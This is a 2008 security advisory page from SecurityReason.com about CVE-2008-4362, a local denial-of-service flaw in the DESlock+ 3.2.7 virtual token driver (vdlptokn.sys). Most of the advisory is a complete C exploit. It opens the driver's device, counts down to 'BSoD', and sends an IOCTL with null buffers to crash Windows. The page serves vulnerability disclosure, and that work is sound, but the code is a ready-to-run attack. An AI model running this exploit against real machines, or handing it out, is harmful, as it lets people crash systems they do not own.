SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow SecurityAlert Database

Arrow  Topic :

DESlock+ 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit


Arrow  SecurityAlert : 4341
Arrow  CVE : CVE-2008-4362
Arrow  CWE : CWE-399
Arrow  SecurityRisk : Low  Security Risk Low  (About)
Arrow  Remote Exploit : No
Arrow  Local Exploit : Yes
Arrow  Victim interaction required : No
Arrow  Exploit Available : No
Arrow  Credit : alex
Arrow  Published : 03.10.2008

Arrow  Affected Software : deslock:deslock:3.2.7



Arrow  Advisory Content :  

///////////////////////////////////////////////////////////////////////////
/////////
//
+--------------------------------------------------------------------------
--+ //
// |
| //
// | Data Encryption Systems Ltd. - http://www.deslock.com/
| //
// | Data Encryption Systems DESlock+ - 3.2.7
| //
// | DESlock+ Virtual Token Driver - 1.0.2.43 - vdlptokn.sys
| //
// | DoS Exploit
| //
// |
| //
//
+--------------------------------------------------------------------------
--+ //
// |
| //
// | NT Internals - http://www.ntinternals.org/
| //
// | alex ntinternals org
| //
// | 21 September 2008
| //
// |
| //
//
+--------------------------------------------------------------------------
--+ //
///////////////////////////////////////////////////////////////////////////
/////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define IMP_VOID __declspec(dllimport) VOID __stdcall
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall

#define OBJ_CASE_INSENSITIVE 0x00000040
#define FILE_OPEN_IF 0x00000003

typedef ULONG NTSTATUS;

typedef struct _UNICODE_STRING
{
/* 0x00 */ USHORT Length;
/* 0x02 */ USHORT MaximumLength;
/* 0x04 */ PWSTR Buffer;
/* 0x08 */
}
UNICODE_STRING,
*PUNICODE_STRING,
**PPUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES
{
/* 0x00 */ ULONG Length;
/* 0x04 */ HANDLE RootDirectory;
/* 0x08 */ PUNICODE_STRING ObjectName;
/* 0x0C */ ULONG Attributes;
/* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor;
/* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
/* 0x18 */
}
OBJECT_ATTRIBUTES,
*POBJECT_ATTRIBUTES,
**PPOBJECT_ATTRIBUTES;

typedef struct _IO_STATUS_BLOCK
{
union
{
/* 0x00 */ NTSTATUS Status;
/* 0x00 */ PVOID Pointer;
};

/* 0x04 */ ULONG Information;
/* 0x08 */
}
IO_STATUS_BLOCK,
*PIO_STATUS_BLOCK,
**PPIO_STATUS_BLOCK;

typedef VOID (NTAPI *PIO_APC_ROUTINE)
(
IN PVOID ApcContext,
IN PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG Reserved
);

IMP_VOID RtlInitUnicodeString
(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);

IMP_VOID RtlFreeUnicodeString
(
IN PUNICODE_STRING UnicodeString
);

IMP_SYSCALL NtCreateFile
(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PLARGE_INTEGER AllocationSize OPTIONAL,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PVOID EaBuffer OPTIONAL,
IN ULONG EaLength
);

IMP_SYSCALL NtDeviceIoControlFile
(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength
);

IMP_SYSCALL NtClose
(
IN HANDLE Handle
);

IMP_SYSCALL NtDelayExecution
(
IN BOOLEAN Alertable,
IN PLARGE_INTEGER Interval
);

int __cdecl main(int argc, char **argv)
{
NTSTATUS NtStatus;

HANDLE DeviceHandle;

UNICODE_STRING DeviceName;
OBJECT_ATTRIBUTES ObjectAttributes;
IO_STATUS_BLOCK IoStatusBlock;
LARGE_INTEGER Interval;


///////////////////////////////////////////////////////////////////////////
////////////////////

system("cls");

printf( "
+--------------------------------------------------------------------------
--+\n"
" |
|\n"
" | Data Encryption Systems Ltd. - http://www.deslock.com/
|\n"
" | Data Encryption Systems DESlock+ - 3.2.7
|\n"
" | DESlock+ Virtual Token Driver - 1.0.2.43 - vdlptokn.sys
|\n"
" | DoS Exploit
|\n"
" |
|\n"
"
+--------------------------------------------------------------------------
--+\n"
" |
|\n"
" | NT Internals - http://www.ntinternals.org/
|\n"
" | alex ntinternals org
|\n"
" | 21 September 2008
|\n"
" |
|\n"
"
+--------------------------------------------------------------------------
--+\n\n");


///////////////////////////////////////////////////////////////////////////
////////////////////

RtlInitUnicodeString(&DeviceName, L"\\Device\\DLPTokenWalter0");

ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
ObjectAttributes.RootDirectory = 0;
ObjectAttributes.ObjectName = &DeviceName;
ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE;
ObjectAttributes.SecurityDescriptor = NULL;
ObjectAttributes.SecurityQualityOfService = NULL;


NtStatus = NtCreateFile(
&DeviceHandle, //
FileHandle
FILE_READ_DATA | FILE_WRITE_DATA, //
DesiredAccess
&ObjectAttributes, //
ObjectAttributes
&IoStatusBlock, //
IoStatusBlock
NULL, //
AllocationSize OPTIONAL
0, //
FileAttributes
FILE_SHARE_READ | FILE_SHARE_WRITE, //
ShareAccess
FILE_OPEN_IF, //
CreateDisposition
0, //
CreateOptions
NULL, // EaBuffer
OPTIONAL
0); //
EaLength

if(NtStatus)
{
printf(" [*] NtStatus of NtCreateFile - 0x%.8X\n", NtStatus);
return NtStatus;
}

RtlFreeUnicodeString(&DeviceName);


///////////////////////////////////////////////////////////////////////////
////////////////////

Interval.LowPart = 0xFF676980;
Interval.HighPart = 0xFFFFFFFF;

printf(" 3");
NtDelayExecution(FALSE, &Interval);

printf(" 2");
NtDelayExecution(FALSE, &Interval);

printf(" 1");
NtDelayExecution(FALSE, &Interval);

printf(" BSoD\n\n");
NtDelayExecution(FALSE, &Interval);


NtStatus = NtDeviceIoControlFile(
DeviceHandle, // FileHandle
NULL, // Event
NULL, // ApcRoutine
NULL, // ApcContext
&IoStatusBlock, // IoStatusBlock
0x002220C0, // IoControlCode
NULL, // InputBuffer
0, // InputBufferLength
NULL, // OutputBuffer
0); // OutBufferLength

if(NtStatus)
{
printf(" [*] NtStatus of NtDeviceIoControlFile - 0x%.8X\n",
NtStatus);
return NtStatus;
}


///////////////////////////////////////////////////////////////////////////
////////////////////

NtStatus = NtClose(DeviceHandle); // Handle

if(NtStatus)
{
printf(" [*] NtStatus of NtClose - 0x%.8X\n", NtStatus);
return NtStatus;
}

return 0;
}



Arrow  References :

http://securityreason.com/expldownload/1/4739/1 (Exploit)
http://www.milw0rm.com/exploits/6515
http://www.frsirt.com/english/advisories/2008/2638
http://secunia.com/advisories/31921




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...
Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration
PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass
Copyright © SecurityReason.com. All Rights Reserved.